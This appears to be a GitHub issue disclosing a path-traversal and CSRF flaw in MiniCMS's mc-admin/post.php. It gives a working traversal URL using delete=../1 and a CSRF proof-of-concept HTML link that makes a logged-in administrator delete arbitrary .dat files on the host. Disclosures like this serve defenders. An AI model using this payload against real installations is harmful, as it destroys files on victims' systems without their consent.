Closed
Description
Software Link : https://github.com/bg5sbk/MiniCMS After the installation is complete, log in as administrator, open the page
In post.php, user can delete any local .dat files without filter
Create 1.dat in the parent directory
To delete 1.dat, the url is like http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=
Also you can delete any .dat file like local google chrome file
Here is CSRF POC test.html: Log in and click the link in test.html, modify the parameter of delete and users will delete the .dat file in the specified directory at last.
<a href="http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=">click</a>
Metadata
Assignees
Labels
No labels


